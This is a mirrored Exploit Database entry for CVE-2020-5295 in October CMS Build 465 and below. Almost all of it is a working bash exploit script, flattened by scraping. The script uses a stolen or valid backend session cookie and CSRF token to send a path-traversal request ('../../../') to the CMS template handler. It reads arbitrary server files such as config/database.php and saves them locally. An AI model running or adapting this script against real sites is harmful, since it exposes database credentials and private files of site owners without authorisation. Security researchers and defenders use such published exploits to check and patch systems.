October CMS Build 465 – Arbitrary File Read Exploit (Authenticated)

• Exploit Database
• 106 阅读

• 作者： Sivanesh Ashok
  日期： 2020-11-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49045/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  # Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit (Authenticated) # Date: 2020-03-31 # Exploit Author: Sivanesh Ashok # Vendor Homepage: https://octobercms.com/ # Version: Build 465 and below # Tested on: Windows 10 / XAMPP / October CMS Build 465 # CVE: CVE-2020-5295   echo &apos;&apos;&apos; Authenticated arbitrary file read exploit for October CMS <= Build 465 Tested on: v1.0.45 &apos;&apos;&apos;   rm /tmp/ocms_* &> /dev/null   if [[ ! <code>command -v recode</code> ]]; then echo -e "[!] Missing package &apos;recode&apos;\n[!] Install &apos;recode&apos; using the respective command to resume\n\tsudo apt install recode\n\tsudo pacman -S recode\n\tyum install recode" echo -e "[*] Exiting!\n" exit 0 fi   read -p "[*] Enter target host (with http/https): " host echo "" read -p "[*] Enter your cookie value: " cookie   curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml   if [[ ! <code>awk &apos;/<span class="nav-label">/,/<\/span>/&apos; /tmp/ocms_gethtml | grep "Assets"</code> ]]; then echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid" echo -e "[*] Exiting!\n" exit 0 fi   echo &apos;&apos;&apos; [!] Relative path to the target file is required. eg. config/database.php If you are unsure about the path, check OctoberCMS github which has the default file system hosted https://github.com/octobercms/october &apos;&apos;&apos;   read -p "[*] Enter path to the target file: " targetfile themename=<code>grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F&apos;"&apos; &apos;{print $6}&apos; csrftoken=<code>grep "csrf-token" /tmp/ocms_gethtml | awk -F&apos;"&apos; &apos;{print $4}&apos; curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres   cat /tmp/ocms_jsonres | jq -r &apos;.tab&apos; 2> /dev/null | awk &apos;/<textarea/,/<\/textarea>/&apos; 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null   if [[ <code>cat /tmp/ocms_file</code> ]]; then cp /tmp/ocms_file ./october_extractedfile echo -e "\n[+] File saved as ./october_extractedfile!\n" exit 1 else echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n" exit 0 fi